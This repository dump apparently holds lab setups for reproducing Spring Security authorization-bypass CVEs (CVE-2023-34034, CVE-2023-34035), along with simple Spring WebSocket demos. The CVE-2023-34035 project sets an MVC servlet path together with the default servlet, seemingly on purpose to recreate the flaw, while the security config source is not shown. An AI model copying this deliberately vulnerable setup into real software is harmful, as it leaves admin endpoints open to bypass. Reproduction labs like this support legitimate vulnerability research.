https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-20860/target/test-classes/com/example/demo/DemoApplicationTests.class
--------------------------------------------------------------------------------
/CVE-2023-34034/HELP.md:
--------------------------------------------------------------------------------
1 | # Getting Started
2 |
3 | ### Reference Documentation
4 | For further reference, please consider the following sections:
5 |
6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html)
7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/)
8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/#build-image)
9 | * [Spring Security](https://docs.spring.io/spring-boot/docs/2.7.4/reference/htmlsingle/#web.security)
10 |
11 | ### Guides
12 | The following guides illustrate how to use some features concretely:
13 |
14 | * [Securing a Web Application](https://spring.io/guides/gs/securing-web/)
15 | * [Spring Boot and OAuth2](https://spring.io/guides/tutorials/spring-boot-oauth2/)
16 | * [Authenticating a User with LDAP](https://spring.io/guides/gs/authenticating-ldap/)
17 |
18 |
--------------------------------------------------------------------------------
/CVE-2023-34034/src/main/java/com/example/demo/Controller/AdminController.java:
--------------------------------------------------------------------------------
1 | package com.example.demo.Controller;
2 |
3 | import org.springframework.stereotype.Controller;
4 | import org.springframework.web.bind.annotation.*;
5 | import reactor.core.publisher.Mono;
6 |
7 | @RestController
8 | @RequestMapping("/admin")
9 | public class AdminController {
10 |
11 | @GetMapping("/get")
12 | public Mono getPublicResource() {
13 | return Mono.just("hello admin!");
14 | }
15 | }
16 |
--------------------------------------------------------------------------------
/CVE-2023-34034/src/main/java/com/example/demo/Controller/PublicController.java:
--------------------------------------------------------------------------------
1 | package com.example.demo.Controller;
2 |
3 | import org.springframework.web.bind.annotation.GetMapping;
4 | import org.springframework.web.bind.annotation.RequestMapping;
5 | import org.springframework.web.bind.annotation.RestController;
6 | import reactor.core.publisher.Mono;
7 |
8 | @RestController
9 | @RequestMapping("/public")
10 | public class PublicController {
11 |
12 | @GetMapping("/get")
13 | public Mono getPublicResource() {
14 | return Mono.just("hello!");
15 | }
16 |
17 | }
18 |
--------------------------------------------------------------------------------
/CVE-2023-34034/src/main/java/com/example/demo/DemoApplication.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 |
6 | @SpringBootApplication
7 | public class DemoApplication {
8 |
9 | public static void main(String[] args) {
10 | SpringApplication.run(DemoApplication.class, args);
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2023-34034/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8085
2 |
--------------------------------------------------------------------------------
/CVE-2023-34034/src/test/java/com/example/demo/DemoApplicationTests.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.junit.jupiter.api.Test;
4 | import org.springframework.boot.test.context.SpringBootTest;
5 |
6 | @SpringBootTest
7 | class DemoApplicationTests {
8 |
9 | @Test
10 | void contextLoads() {
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2023-34034/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8085
2 |
--------------------------------------------------------------------------------
/CVE-2023-34034/target/classes/com/example/demo/Config/AuthConfig.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34034/target/classes/com/example/demo/Config/AuthConfig.class
--------------------------------------------------------------------------------
/CVE-2023-34034/target/classes/com/example/demo/Controller/AdminController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34034/target/classes/com/example/demo/Controller/AdminController.class
--------------------------------------------------------------------------------
/CVE-2023-34034/target/classes/com/example/demo/Controller/PublicController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34034/target/classes/com/example/demo/Controller/PublicController.class
--------------------------------------------------------------------------------
/CVE-2023-34034/target/classes/com/example/demo/DemoApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34034/target/classes/com/example/demo/DemoApplication.class
--------------------------------------------------------------------------------
/CVE-2023-34035/HELP.md:
--------------------------------------------------------------------------------
1 | # Getting Started
2 |
3 | ### Reference Documentation
4 | For further reference, please consider the following sections:
5 |
6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html)
7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/)
8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/#build-image)
9 | * [Spring Security](https://docs.spring.io/spring-boot/docs/2.7.4/reference/htmlsingle/#web.security)
10 |
11 | ### Guides
12 | The following guides illustrate how to use some features concretely:
13 |
14 | * [Securing a Web Application](https://spring.io/guides/gs/securing-web/)
15 | * [Spring Boot and OAuth2](https://spring.io/guides/tutorials/spring-boot-oauth2/)
16 | * [Authenticating a User with LDAP](https://spring.io/guides/gs/authenticating-ldap/)
17 |
18 |
--------------------------------------------------------------------------------
/CVE-2023-34035/demo.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/CVE-2023-34035/src/main/java/com/example/demo/Controller/AuthController.java:
--------------------------------------------------------------------------------
1 | package com.example.demo.Controller;
2 |
3 | import org.springframework.stereotype.Controller;
4 | import org.springframework.web.bind.annotation.GetMapping;
5 | import org.springframework.web.bind.annotation.PathVariable;
6 | import org.springframework.web.bind.annotation.ResponseBody;
7 |
8 | @Controller
9 | public class AuthController {
10 | @GetMapping
11 | @ResponseBody
12 | public String index() {
13 | return "welcome";
14 | }
15 |
16 | @GetMapping("/admin/{name}")
17 | @ResponseBody
18 | public String admin(@PathVariable String name) {
19 | return "welcome " + name;
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/CVE-2023-34035/src/main/java/com/example/demo/DemoApplication.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 |
6 | @SpringBootApplication
7 | public class DemoApplication {
8 |
9 | public static void main(String[] args) {
10 | SpringApplication.run(DemoApplication.class, args);
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2023-34035/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8085
2 | spring.mvc.servlet.path=/mvc
3 | server.servlet.register-default-servlet=true
4 |
--------------------------------------------------------------------------------
/CVE-2023-34035/src/test/java/com/example/demo/DemoApplicationTests.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.junit.jupiter.api.Test;
4 | import org.springframework.boot.test.context.SpringBootTest;
5 |
6 | @SpringBootTest
7 | class DemoApplicationTests {
8 |
9 | @Test
10 | void contextLoads() {
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2023-34035/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8085
2 | spring.mvc.servlet.path=/mvc
3 | server.servlet.register-default-servlet=true
4 |
--------------------------------------------------------------------------------
/CVE-2023-34035/target/classes/com/example/demo/Config/AuthConfig.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34035/target/classes/com/example/demo/Config/AuthConfig.class
--------------------------------------------------------------------------------
/CVE-2023-34035/target/classes/com/example/demo/Controller/AuthController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34035/target/classes/com/example/demo/Controller/AuthController.class
--------------------------------------------------------------------------------
/CVE-2023-34035/target/classes/com/example/demo/DemoApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34035/target/classes/com/example/demo/DemoApplication.class
--------------------------------------------------------------------------------
/CVE-2023-34035/target/demo-0.0.1-SNAPSHOT.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34035/target/demo-0.0.1-SNAPSHOT.jar
--------------------------------------------------------------------------------
/CVE-2023-34035/target/demo-0.0.1-SNAPSHOT.jar.original:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34035/target/demo-0.0.1-SNAPSHOT.jar.original
--------------------------------------------------------------------------------
/CVE-2023-34035/target/maven-archiver/pom.properties:
--------------------------------------------------------------------------------
1 | artifactId=demo
2 | groupId=com.example
3 | version=0.0.1-SNAPSHOT
4 |
--------------------------------------------------------------------------------
/CVE-2023-34035/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst:
--------------------------------------------------------------------------------
1 | com/example/demo/DemoApplication.class
2 | com/example/demo/Config/AuthConfig.class
3 | com/example/demo/Controller/AuthController.class
4 |
--------------------------------------------------------------------------------
/CVE-2023-34035/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst:
--------------------------------------------------------------------------------
1 | /Users/dxy/Downloads/CVE-2023-34035/src/main/java/com/example/demo/Config/AuthConfig.java
2 | /Users/dxy/Downloads/CVE-2023-34035/src/main/java/com/example/demo/Controller/AuthController.java
3 | /Users/dxy/Downloads/CVE-2023-34035/src/main/java/com/example/demo/DemoApplication.java
4 |
--------------------------------------------------------------------------------
/CVE-2023-34035/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/createdFiles.lst:
--------------------------------------------------------------------------------
1 | com/example/demo/DemoApplicationTests.class
2 |
--------------------------------------------------------------------------------
/CVE-2023-34035/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/inputFiles.lst:
--------------------------------------------------------------------------------
1 | /Users/dxy/Downloads/CVE-2023-34035/src/test/java/com/example/demo/DemoApplicationTests.java
2 |
--------------------------------------------------------------------------------
/CVE-2023-34035/target/surefire-reports/com.example.demo.DemoApplicationTests.txt:
--------------------------------------------------------------------------------
1 | -------------------------------------------------------------------------------
2 | Test set: com.example.demo.DemoApplicationTests
3 | -------------------------------------------------------------------------------
4 | Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1.984 s - in com.example.demo.DemoApplicationTests
5 |
--------------------------------------------------------------------------------
/CVE-2023-34035/target/test-classes/com/example/demo/DemoApplicationTests.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34035/target/test-classes/com/example/demo/DemoApplicationTests.class
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/README.md:
--------------------------------------------------------------------------------
1 | ## Srping boot Websocket 集成
2 |
3 | 技术单:
4 |
5 | - Spring boot 和 STOMP
6 | - Spring security
7 | - Why we using websocket
8 | - High frequency
9 | - Low latency
10 |
11 |
12 | ## 参考资料
13 |
14 | - http://www.devglan.com/spring-boot/spring-boot-websocket-integration-example
15 | - http://tech.lede.com/2017/03/08/qa/websocket+spring/
16 | - http://blog.csdn.net/elonpage/article/details/78446695?locationNum=5&fps=1
17 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/src/main/java/com/devglan/Application.java:
--------------------------------------------------------------------------------
1 | package com.devglan;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 |
6 | @SpringBootApplication
7 | public class Application {
8 |
9 | public static void main(String[] args) {
10 | SpringApplication.run(Application.class, args);
11 |
12 | }
13 | }
14 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/src/main/java/com/devglan/interceptor/SendMessageChannelInterceptor.java:
--------------------------------------------------------------------------------
1 | package com.devglan.interceptor;
2 |
3 | import org.slf4j.Logger;
4 | import org.slf4j.LoggerFactory;
5 | import org.springframework.messaging.Message;
6 | import org.springframework.messaging.MessageChannel;
7 | import org.springframework.messaging.support.ChannelInterceptorAdapter;
8 | import org.springframework.stereotype.Component;
9 |
10 | @Component
11 | public class SendMessageChannelInterceptor extends ChannelInterceptorAdapter {
12 |
13 | private static final Logger logger = LoggerFactory.getLogger(SendMessageChannelInterceptor.class);
14 |
15 | @Override
16 | public Message preSend(Message message, MessageChannel channel) {
17 | logger.info("Send message: {}", message);
18 | return super.preSend(message, channel);
19 | }
20 | }
21 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/src/main/java/com/devglan/websocket/event/StompConnectEventListener.java:
--------------------------------------------------------------------------------
1 | package com.devglan.websocket.event;
2 |
3 | import org.slf4j.Logger;
4 | import org.slf4j.LoggerFactory;
5 | import org.springframework.context.ApplicationListener;
6 | import org.springframework.messaging.simp.stomp.StompHeaderAccessor;
7 | import org.springframework.stereotype.Component;
8 | import org.springframework.web.socket.messaging.SessionConnectEvent;
9 |
10 | @Component
11 | public class StompConnectEventListener implements ApplicationListener {
12 | private static final Logger logger = LoggerFactory.getLogger(StompConnectEventListener.class);
13 |
14 | @Override
15 | public void onApplicationEvent(SessionConnectEvent event) {
16 | StompHeaderAccessor accessor = StompHeaderAccessor.wrap(event.getMessage());
17 | logger.info("Accept connection request from client: {}", accessor.getHost());
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/src/main/java/com/devglan/websocket/event/StompConnectedEventListener.java:
--------------------------------------------------------------------------------
1 | package com.devglan.websocket.event;
2 |
3 | import org.slf4j.Logger;
4 | import org.slf4j.LoggerFactory;
5 | import org.springframework.context.ApplicationListener;
6 | import org.springframework.messaging.simp.stomp.StompHeaderAccessor;
7 | import org.springframework.stereotype.Component;
8 | import org.springframework.web.socket.messaging.SessionConnectedEvent;
9 |
10 | @Component
11 | public class StompConnectedEventListener implements ApplicationListener {
12 | private static final Logger logger = LoggerFactory.getLogger(StompConnectedEventListener.class);
13 |
14 | @Override
15 | public void onApplicationEvent(SessionConnectedEvent event) {
16 | StompHeaderAccessor accessor = StompHeaderAccessor.wrap(event.getMessage());
17 | logger.info("Connection build successfully: {}", accessor.getUser());
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/src/main/java/com/devglan/websocket/event/StompSubscribeEventListener.java:
--------------------------------------------------------------------------------
1 | package com.devglan.websocket.event;
2 |
3 | import org.slf4j.Logger;
4 | import org.slf4j.LoggerFactory;
5 | import org.springframework.context.ApplicationListener;
6 | import org.springframework.messaging.simp.stomp.StompHeaderAccessor;
7 | import org.springframework.stereotype.Component;
8 | import org.springframework.web.socket.messaging.SessionSubscribeEvent;
9 |
10 | @Component
11 | public class StompSubscribeEventListener implements ApplicationListener {
12 |
13 | private static final Logger logger = LoggerFactory.getLogger(StompSubscribeEventListener.class);
14 |
15 | @Override
16 | public void onApplicationEvent(SessionSubscribeEvent sessionSubscribeEvent) {
17 | StompHeaderAccessor headerAccessor = StompHeaderAccessor.wrap(sessionSubscribeEvent.getMessage());
18 | logger.info(headerAccessor.toString());
19 | }
20 | }
21 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8089
2 | server.address=10.128.5.250
3 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/src/main/resources/static/main.css:
--------------------------------------------------------------------------------
1 | body {
2 | background-color: #f5f5f5;
3 | }
4 |
5 | #main-content {
6 | max-width: 940px;
7 | padding: 2em 3em;
8 | margin: 0 auto 20px;
9 | background-color: #fff;
10 | border: 1px solid #e5e5e5;
11 | -webkit-border-radius: 5px;
12 | -moz-border-radius: 5px;
13 | border-radius: 5px;
14 | }
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8089
2 | server.address=10.128.5.250
3 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/Application.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/Application.class
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/config/WebSocketConfig$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/config/WebSocketConfig$1.class
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/config/WebSocketConfig$2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/config/WebSocketConfig$2.class
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/config/WebSocketConfig.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/config/WebSocketConfig.class
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/controller/WebSocketController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/controller/WebSocketController.class
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/interceptor/ReceiveMessageChannelInterceptor.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/interceptor/ReceiveMessageChannelInterceptor.class
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/interceptor/SendMessageChannelInterceptor.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/interceptor/SendMessageChannelInterceptor.class
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/interceptor/WebSocketHandshakeInterceptor.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/interceptor/WebSocketHandshakeInterceptor.class
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/websocket/event/StompConnectEventListener.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/websocket/event/StompConnectEventListener.class
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/websocket/event/StompConnectedEventListener.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/websocket/event/StompConnectedEventListener.class
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/websocket/event/StompSubscribeEventListener.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/websocket/event/StompSubscribeEventListener.class
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-with-STOMP/target/classes/static/main.css:
--------------------------------------------------------------------------------
1 | body {
2 | background-color: #f5f5f5;
3 | }
4 |
5 | #main-content {
6 | max-width: 940px;
7 | padding: 2em 3em;
8 | margin: 0 auto 20px;
9 | background-color: #fff;
10 | border: 1px solid #e5e5e5;
11 | -webkit-border-radius: 5px;
12 | -moz-border-radius: 5px;
13 | border-radius: 5px;
14 | }
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/HELP.md:
--------------------------------------------------------------------------------
1 | # Getting Started
2 |
3 | ### Reference Documentation
4 | For further reference, please consider the following sections:
5 |
6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html)
7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/)
8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/#build-image)
9 | * [WebSocket](https://docs.spring.io/spring-boot/docs/2.7.1/reference/htmlsingle/#messaging.websockets)
10 |
11 | ### Guides
12 | The following guides illustrate how to use some features concretely:
13 |
14 | * [Using WebSocket to build an interactive web application](https://spring.io/guides/gs/messaging-stomp-websocket/)
15 |
16 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/src/main/java/com/example/demo/BinarySocketHandler.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.springframework.stereotype.Component;
4 | import org.springframework.web.socket.BinaryMessage;
5 | import org.springframework.web.socket.WebSocketSession;
6 | import org.springframework.web.socket.handler.BinaryWebSocketHandler;
7 |
8 | /**
9 | * 二进制 WebSocket 处理器
10 | */
11 | @Component
12 | public class BinarySocketHandler extends BinaryWebSocketHandler {
13 | @Override
14 | protected void handleBinaryMessage(WebSocketSession session, BinaryMessage message) throws Exception {
15 | session.sendMessage(new BinaryMessage("hello world!".getBytes()));
16 | }
17 | }
18 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/src/main/java/com/example/demo/DemoApplication.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 |
6 | @SpringBootApplication
7 | public class DemoApplication {
8 |
9 | public static void main(String[] args) {
10 | SpringApplication.run(DemoApplication.class, args);
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/src/main/java/com/example/demo/ProtocolBufferSocketHandler.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.springframework.stereotype.Component;
4 | import org.springframework.web.socket.BinaryMessage;
5 | import org.springframework.web.socket.WebSocketSession;
6 | import org.springframework.web.socket.handler.BinaryWebSocketHandler;
7 |
8 | /**
9 | * 不支持非二进制的消息, 具体可以参考 BinaryWebSocketHandler 中的 handleTextMessage 方法.
10 | * 也可以覆盖 BinaryWebSocketHandler.handleTextMessage 方法来自定义错误消息.
11 | */
12 | @Component
13 | public class ProtocolBufferSocketHandler extends BinaryWebSocketHandler {
14 | @Override
15 | protected void handleBinaryMessage(WebSocketSession session, BinaryMessage message) throws Exception {
16 | super.handleBinaryMessage(session, message);
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/src/main/java/com/example/demo/WebSocketConfig.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.springframework.context.annotation.Configuration;
4 | import org.springframework.web.socket.config.annotation.EnableWebSocket;
5 | import org.springframework.web.socket.config.annotation.WebSocketConfigurer;
6 | import org.springframework.web.socket.config.annotation.WebSocketHandlerRegistry;
7 |
8 | @Configuration
9 | @EnableWebSocket
10 | public class WebSocketConfig implements WebSocketConfigurer {
11 | public void registerWebSocketHandlers(WebSocketHandlerRegistry registry) {
12 | registry.addHandler(new SocketHandler(), "/name");
13 | registry.addHandler(new ProtocolBufferSocketHandler(), "/protobuf");
14 | registry.addHandler(new BinarySocketHandler(), "/binary");
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | server.address=10.128.5.250
2 | server.port=8089
3 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/src/main/resources/static/app.js:
--------------------------------------------------------------------------------
1 |
2 | var ws;
3 | function setConnected(connected) {
4 | $("#connect").prop("disabled", connected);
5 | $("#disconnect").prop("disabled", !connected);
6 | if (connected) {
7 | $("#conversation").show();
8 | }
9 | else {
10 | $("#conversation").hide();
11 | }
12 | $("#greetings").html("");
13 | }
14 |
15 | function connect() {
16 | ws = new WebSocket('ws://10.128.5.250:8089/name');
17 | ws.onmessage = function(data){
18 | showGreeting(data.data);
19 | }
20 | setConnected(true);
21 | }
22 |
23 | function disconnect() {
24 | if (ws != null) {
25 | ws.close();
26 | }
27 | setConnected(false);
28 | console.log("Disconnected");
29 | }
30 |
31 | function sendName() {
32 | var data = JSON.stringify({'name': $("#name").val()})
33 | ws.send(data);
34 | }
35 |
36 | function showGreeting(message) {
37 | $("#greetings").append("| " + message + " |
");
38 | }
39 |
40 | $(function () {
41 | $("form").on('submit', function (e) {
42 | e.preventDefault();
43 | });
44 | $( "#connect" ).click(function() { connect(); });
45 | $( "#disconnect" ).click(function() { disconnect(); });
46 | $( "#send" ).click(function() { sendName(); });
47 | });
48 |
49 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/src/main/resources/static/main.css:
--------------------------------------------------------------------------------
1 | body {
2 | background-color: #f5f5f5;
3 | }
4 |
5 | #main-content {
6 | max-width: 940px;
7 | padding: 2em 3em;
8 | margin: 0 auto 20px;
9 | background-color: #fff;
10 | border: 1px solid #e5e5e5;
11 | -webkit-border-radius: 5px;
12 | -moz-border-radius: 5px;
13 | border-radius: 5px;
14 | }
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | server.address=10.128.5.250
2 | server.port=8089
3 |
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/BinarySocketHandler.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/BinarySocketHandler.class
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/DemoApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/DemoApplication.class
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/ProtocolBufferSocketHandler.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/ProtocolBufferSocketHandler.class
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/SocketHandler.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/SocketHandler.class
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/WebSocketConfig.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/WebSocketConfig.class
--------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/target/classes/static/app.js:
--------------------------------------------------------------------------------
1 |
2 | var ws;
3 | function setConnected(connected) {
4 | $("#connect").prop("disabled", connected);
5 | $("#disconnect").prop("disabled", !connected);
6 | if (connected) {
7 | $("#conversation").show();
8 | }
9 | else {
10 | $("#conversation").hide();
11 | }
12 | $("#greetings").html("");
13 | }
14 |
15 | function connect() {
16 | ws = new WebSocket('ws://10.128.5.250:8089/name');
17 | ws.onmessage = function(data){
18 | showGreeting(data.data);
19 | }
20 | setConnected(true);
21 | }
22 |
23 | function disconnect() {
24 | if (ws != null) {
25 | ws.close();
26 | }
27 | setConnected(false);
28 | console.log("Disconnected");
29 | }
30 |
31 | function sendName() {
32 | var data = JSON.stringify({'name': $("#name").val()})
33 | ws.send(data);
34 | }
35 |
36 | function showGreeting(message) {
37 | $("#greetings").append("| " + message + " |
");
38 | }
39 |
40 | $(function () {
41 | $("form").on('submit', function (e) {
42 | e.preventDefault();
43 | });
44 | $( "#connect" ).click(function() { connect(); });
45 | $( "#disconnect" ).click(function() { disconnect(); });
46 | $( "#send" ).click(function() { sendName(); });
47 | });
48 |
49 |
--------------------------------------------------------------------------------
